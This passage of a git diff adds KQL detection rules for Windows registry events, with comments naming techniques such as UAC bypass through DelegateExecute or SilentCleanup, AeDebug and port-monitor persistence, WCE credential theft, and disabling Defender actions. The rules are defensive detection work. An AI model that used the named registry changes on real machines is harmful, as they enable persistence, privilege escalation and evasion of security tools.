--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql
@@ -0,0 +1,10 @@
+// Title: Windows Credential Editor Registry
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-31
+// Level: critical
+// Description: Detects the use of Windows Credential Editor (WCE)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.s0005
+
+DeviceRegistryEvents
+| where RegistryKey contains "Services\\WCESERVICE\\Start"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql
new file mode 100644
index 00000000..1496fade
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql
@@ -0,0 +1,15 @@
+// Title: Windows Defender Threat Severity Default Action Modified
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,
+// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.
+//   - Software installations that legitimately modify Defender settings (less common for these specific keys).
+
+DeviceRegistryEvents
+| where (RegistryValueData in~ ("DWORD (0x00000006)", "DWORD (0x00000009)")) and RegistryKey endswith "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction*" and (RegistryKey endswith "\\1" or RegistryKey endswith "\\2" or RegistryKey endswith "\\4" or RegistryKey endswith "\\5")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql b/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql
new file mode 100644
index 00000000..5e5f7158
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql
@@ -0,0 +1,12 @@
+// Title: Windows Registry Trust Record Modification
+// Author: Antonlovesdnb, Trent Liffick (@tliffick)
+// Date: 2020-02-19
+// Level: medium
+// Description: Alerts on trust record modification within the registry, indicating usage of macros
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+//   - This will alert on legitimate macro usage as well, additional tuning is required
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql b/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql
new file mode 100644
index 00000000..dce118d6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql
@@ -0,0 +1,10 @@
+// Title: WINEKEY Registry Modification
+// Author: omkar72
+// Date: 2020-10-30
+// Level: high
+// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceRegistryEvents
+| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql
new file mode 100644
index 00000000..8d091e01
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql
@@ -0,0 +1,10 @@
+// Title: Activate Suppression of Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql
new file mode 100644
index 00000000..fcc2126a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Add Debugger Entry To AeDebug For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
+| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql
new file mode 100644
index 00000000..0dfded9b
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Add Debugger Entry To Hangs Key For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - This value is not set by default but could be rarly used by administrators
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql b/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql
new file mode 100644
index 00000000..407fa6ed
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql
@@ -0,0 +1,10 @@
+// Title: Add DisallowRun Execution to Registry
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql b/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql
new file mode 100644
index 00000000..f670f907
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql
@@ -0,0 +1,11 @@
+// Title: Add Port Monitor Persistence in Registry
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
+// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where (RegistryValueData endswith ".dll" and RegistryKey endswith "\\Control\\Print\\Monitors*") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey endswith "Control\\Print\\Environments*" and RegistryKey endswith "\\Drivers*" and RegistryKey contains "\\VNC Printer"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql b/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql
new file mode 100644
index 00000000..42f5a68d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql
@@ -0,0 +1,12 @@
+// Title: Allow RDP Remote Assistance Feature
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate use of the feature (alerts should be investigated either way)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
new file mode 100644
index 00000000..7489d25a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
@@ -0,0 +1,12 @@
+// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
+// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-05
+// Level: high
+// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql
new file mode 100644
index 00000000..a5785617
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql
@@ -0,0 +1,10 @@
+// Title: Bypass UAC Using DelegateExecute
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Bypasses User Account Control using a fileless method
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql
new file mode 100644
index 00000000..e724e999
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql
@@ -0,0 +1,10 @@
+// Title: Bypass UAC Using Event Viewer
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql
new file mode 100644
index 00000000..695c79b7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC Using SilentCleanup Task
+// Author: frack113, Nextron Systems
+// Date: 2022-01-06
+// Level: high
+// Description: Detects the setting of the environement variable "windir" to a non default value.
+// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
+// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql b/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql
new file mode 100644
index 00000000..5ad43122
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql
@@ -0,0 +1,10 @@
+// Title: Change the Fax Dll
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect possible persistence using Fax DLL load when service restart
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql
new file mode 100644
index 00000000..cd03cc49
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql
@@ -0,0 +1,10 @@
+// Title: Change User Account Associated with the FAX Service
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql
new file mode 100644
index 00000000..ddc96723
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql
@@ -0,0 +1,10 @@
+// Title: Change Winevt Channel Access Permission Via Registry
+// Author: frack113
+// Date: 2022-09-17
+// Level: high
+// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql
new file mode 100644
index 00000000..f4f97bdf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Classes Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey endswith "\\lnkfile\\shellex\\ContextMenuHandlers*")))) and (not(RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql b/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql
new file mode 100644
index 00000000..e2d1d762
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql
@@ -0,0 +1,12 @@
+// Title: ClickOnce Trust Prompt Tampering
+// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate internal requirements.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "Enabled" and RegistryKey endswith "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel*" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql
new file mode 100644
index 00000000..548e999a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql
@@ -0,0 +1,10 @@
+// Title: COM Hijack via Sdclt
+// Author: Omkar Gudhate
+// Date: 2020-09-27
+// Level: high
+// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql b/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql
new file mode 100644
index 00000000..28e2f9a0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql
@@ -0,0 +1,12 @@
+// Title: COM Hijacking via TreatAs
+// Author: frack113
+// Date: 2022-08-28
+// Level: medium
+// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+//   - Legitimate use
+
+DeviceRegistryEvents
+| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
new file mode 100644
index 00000000..17ddb5f8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
@@ -0,0 +1,12 @@
+// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-16
+// Level: high
+// Description: Detects potential COM object hijacking via modification of default system CLSID.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where ((RegistryKey endswith "\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}*" or RegistryKey endswith "\\{2155fee3-2419-4373-b102-6843707eb41f}*" or RegistryKey endswith "\\{4590f811-1d3a-11d0-891f-00aa004b2e24}*" or RegistryKey endswith "\\{4de225bf-cf59-4cfc-85f7-68b90f185355}*" or RegistryKey endswith "\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}*" or RegistryKey endswith "\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}*" or RegistryKey endswith "\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}*" or RegistryKey endswith "\\{7849596a-48ea-486e-8937-a2a3009f31a9}*" or RegistryKey endswith "\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}*" or RegistryKey endswith "\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}*" or RegistryKey endswith "\\{30D49246-D217-465F-B00B-AC9DDD652EB7}*" or RegistryKey endswith "\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}*" or RegistryKey endswith "\\{2227A280-3AEA-1069-A2DE-08002B30309D}*" or RegistryKey endswith "\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}*" or RegistryKey endswith "\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}*") and (RegistryKey endswith "\\CLSID*" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)"))) and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Temporary Internet" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql
new file mode 100644
index 00000000..e5da89bd
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Common Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler*" or RegistryKey endswith "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler*") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql b/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql
new file mode 100644
index 00000000..4ee20b56
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql
@@ -0,0 +1,12 @@
+// Title: CrashControl CrashDump Disabled
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2022-02-24
+// Level: medium
+// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112
+// False Positives:
+//   - Legitimate disabling of crashdumps
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\CrashControl"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql
new file mode 100644
index 00000000..1612837c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: CurrentControlSet Autorun Keys Modification
